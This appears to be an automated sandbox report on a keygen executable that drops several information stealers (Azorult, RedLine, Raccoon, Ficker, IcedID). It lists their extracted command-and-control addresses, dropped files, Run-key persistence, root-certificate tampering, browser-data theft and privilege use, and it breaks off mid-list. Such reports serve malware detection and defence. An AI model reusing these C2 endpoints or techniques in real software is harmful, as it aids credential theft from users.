Analysis
-
max time kernel
60s -
max time network
62s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
24-03-2021 21:28
Static task
static1
Behavioral task
behavioral1
Sample
PKM.program.do.rysowania.wa.keygen.by.orion.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
PKM.program.do.rysowania.wa.keygen.by.orion.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
PKM.program.do.rysowania.wa.keygen.by.orion.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
PKM.program.do.rysowania.wa.keygen.by.orion.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
PKM.program.do.rysowania.wa.keygen.by.orion.exe
Resource
win7v20201028
General
-
Target
PKM.program.do.rysowania.wa.keygen.by.orion.exe
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
fickerstealer
deniedfight.com:80
Extracted
raccoon
dfa7b4d385486b737f84d608857eb43733ffd299
-
url4cnc
https://telete.in/j9ca1pel
Extracted
icedid
1235390667
petelbomber.xyz
Extracted
redline
black
blackeyed.top:80
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral1/memory/5448-262-0x0000000005AE0000-0x0000000005BD2000-memory.dmp family_redline behavioral1/memory/5448-269-0x00000000059D0000-0x0000000005AC0000-memory.dmp family_redline -
fickerstealer
Ficker is an infostealer written in Rust and ASM.
-
IcedID First Stage Loader 1 IoCs
resource yara_rule behavioral1/memory/3544-272-0x0000000002380000-0x0000000002387000-memory.dmp IcedidFirstLoader -
Downloads MZ/PE file
-
Executes dropped EXE 13 IoCs
pid Process 3168 keygen-pr.exe 4296 keygen-step-1.exe 4044 keygen-step-3.exe 2056 keygen-step-4.exe 1468 key.exe 1464 Setup.exe 2644 multitimer.exe 2640 setups.exe 2480 askinstall20.exe 224 setups.tmp 748 multitimer.exe 2212 md2_2efs.exe 4024 multitimer.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 5 IoCs
pid Process 224 setups.tmp 224 setups.tmp 224 setups.tmp 224 setups.tmp 224 setups.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/5448-243-0x0000000000400000-0x0000000001065000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\hjqqyxtvwrs = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\VF4E5OP561\\multitimer.exe\" 1 3.1616621349.605baf2563366" multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 119 ipinfo.io 121 ipinfo.io 154 api.ipify.org 170 checkip.amazonaws.com 171 ip-api.com -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 5324 5736 WerFault.exe 127 -
Kills process with taskkill 2 IoCs
pid Process 3996 taskkill.exe 3612 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{74919EEA-7D9E-47C4-B255-560F62ED3E11}" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 4974d538f420d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "5" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "1ktb3y0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 23381839f420d701 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000de33048528fb7a2a7091e71ceb0adfdf06ea30c0bc68c27b8d98e86a1b05965167cb1df49354067008253d5cf26f1598655c693fd13258dfa7da160f265ee8a49a5f372efbb6c54ad69d5ac96253c3fa44ea44a8d9a619972ff6 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content MicrosoftEdgeCP.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 4636 PING.EXE 1288 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 120 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 123 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 224 setups.tmp 224 setups.tmp -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 936 MicrosoftEdgeCP.exe 936 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 1464 Setup.exe Token: SeCreateTokenPrivilege 2480 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 2480 askinstall20.exe Token: SeLockMemoryPrivilege 2480 askinstall20.exe Token: SeIncreaseQuotaPrivilege 2480 askinstall20.exe Token: SeMachineAccountPrivilege 2480 askinstall20.exe Token: SeTcbPrivilege 2480 askinstall20.exe Token: SeSecurityPrivilege 2480 askinstall20.exe Token: SeTakeOwnershipPrivilege 2480 askinstall20.exe Token: SeLoadDriverPrivilege 2480 askinstall20.exe Token: SeSystemProfilePrivilege 2480 askinstall20.exe Token: SeSystemtimePrivilege 2480 askinstall20.exe Token: SeProfSingleProcessPrivilege 2480 askinstall20.exe Token: SeIncBasePriorityPrivilege 2480 askinstall20.exe Token: SeCreatePagefilePrivilege 2480 askinstall20.exe Token: SeCreatePermanentPrivilege 2480 askinstall20.exe Token: SeBackupPrivilege 2480 askinstall20.exe Token: SeRestorePrivilege 2480 askinstall20.exe Token: SeShutdownPrivilege 2480 askinstall20.exe Token: SeDebugPrivilege 2480 askinstall20.exe Token: SeAuditPrivilege 2480 askinstall20.exe Token: SeSystemEnvironmentPrivilege 2480 askinstall20.exe Token: SeChangeNotifyPrivilege 2480 askinstall20.exe Token: SeRemoteShutdownPrivilege 2480 askinstall20.exe Token: SeUndockPrivilege 2480 askinstall20.exe Token: SeSyncAgentPrivilege 2480 askinstall20.exe Token: SeEnableDelegationPrivilege 2480 askinstall20.exe Token: SeManageVolumePrivilege 2480 askinstall20.exe Token: SeImpersonatePrivilege 2480 askinstall20.exe Token: SeCreateGlobalPrivilege 2480 askinstall20.exe Token: 31 2480 askinstall20.exe Token: 32 2480 askinstall20.exe Token: 33 2480 askinstall20.exe Token: 34 2480 askinstall20.exe Token: 35 2480 askinstall20.exe Token: SeDebugPrivilege 3996 taskkill.exe Token: SeDebugPrivilege 2644 multitimer.exe Token: SeDebugPrivilege 5064 MicrosoftEdge.exe Token: SeDebugPrivilege 5064 MicrosoftEdge.exe Token: SeDebugPrivilege 5064 MicrosoftEdge.exe Token: SeDebugPrivilege 5064 MicrosoftEdge.exe Token: SeDebugPrivilege 1164 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1164 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1164 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1164 